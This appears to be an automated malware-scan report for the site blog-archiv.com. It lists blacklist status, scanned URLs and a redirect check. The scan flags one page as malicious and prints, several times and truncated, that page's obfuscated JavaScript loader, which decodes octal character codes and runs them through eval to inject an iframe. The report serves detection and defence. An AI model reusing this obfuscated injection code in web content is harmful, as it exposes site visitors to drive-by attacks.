Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=blog-archiv.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://blog-archiv.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://blog-archiv.com/ | 200 OK Content-Length: 10217 Content-Type: text/html | clean |
http://blog-archiv.com/test/fcgi/test.html | 200 OK Content-Length: 5881 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{document;}catch(q){asd=1;}}if(!asd)e=window[v];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0153,0155,0162,0165,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155 Antivirus reports:
| ||
http://blog-archiv.com/test/fcgi/../../index.html | 200 OK Content-Length: 10217 Content-Type: text/html | clean |
http://blog-archiv.com/test/fcgi/../../test/fcgi/test.html | 200 OK Content-Length: 5881 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{document;}catch(q){asd=1;}}if(!asd)e=window[v];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0153,0155,0162,0165,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155 Antivirus reports:
| ||
http://blog-archiv.com/test/fcgi/../../test/fcgi/../../index.html | 200 OK Content-Length: 10217 Content-Type: text/html | clean |
http://blog-archiv.com/test/fcgi/../../test/fcgi/../../test/fcgi/test.html | 200 OK Content-Length: 5881 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{document;}catch(q){asd=1;}}if(!asd)e=window[v];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0153,0155,0162,0165,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155 Antivirus reports:
| ||
http://blog-archiv.com/test/fcgi/../../test/fcgi/../../test/fcgi/../../index.html | 200 OK Content-Length: 10217 Content-Type: text/html | clean |
http://blog-archiv.com/test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/test.html | 200 OK Content-Length: 5881 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{document;}catch(q){asd=1;}}if(!asd)e=window[v];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0153,0155,0162,0165,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155 Antivirus reports:
| ||
http://blog-archiv.com/test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../index.html | 200 OK Content-Length: 10217 Content-Type: text/html | clean |
http://blog-archiv.com/test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/test.html | 200 OK Content-Length: 5881 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{document;}catch(q){asd=1;}}if(!asd)e=window[v];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0153,0155,0162,0165,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155 Antivirus reports:
| ||
http://blog-archiv.com/test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../index.html | 200 OK Content-Length: 10217 Content-Type: text/html | clean |
http://blog-archiv.com/test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/test.html | 200 OK Content-Length: 5881 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{document;}catch(q){asd=1;}}if(!asd)e=window[v];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0153,0155,0162,0165,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155 Antivirus reports:
| ||
http://blog-archiv.com/test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../index.html | 200 OK Content-Length: 10217 Content-Type: text/html | clean |
http://blog-archiv.com/test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/test.html | 200 OK Content-Length: 5881 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{document;}catch(q){asd=1;}}if(!asd)e=window[v];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0153,0155,0162,0165,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155 Antivirus reports:
| ||
http://blog-archiv.com/test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../test/fcgi/../../index.html | 200 OK Content-Length: 10217 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: blog-archiv.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 15 May 2014 14:58:15 GMT
Accept-Ranges: bytes
ETag: "15700be-27e9-4d8c0f97ecd80"
Server: Apache
Content-Length: 10217
Content-Type: text/html
Last-Modified: Mon, 25 Mar 2013 14:53:58 GMT
MS-Author-Via: DAV
X-Powered-By: PleskLin
...10217 bytes of data.
GET / HTTP/1.1
Host: blog-archiv.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 15 May 2014 14:58:15 GMT
Accept-Ranges: bytes
ETag: "15700be-27e9-4d8c0f97ecd80"
Server: Apache
Content-Length: 10217
Content-Type: text/html
Last-Modified: Mon, 25 Mar 2013 14:53:58 GMT
MS-Author-Via: DAV
X-Powered-By: PleskLin
...10217 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: blog-archiv.com
Referer: http://www.google.com/search?q=blog-archiv.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: blog-archiv.com
Referer: http://www.google.com/search?q=blog-archiv.com
Result:
The result is similar to the first query. There are no suspicious redirects found.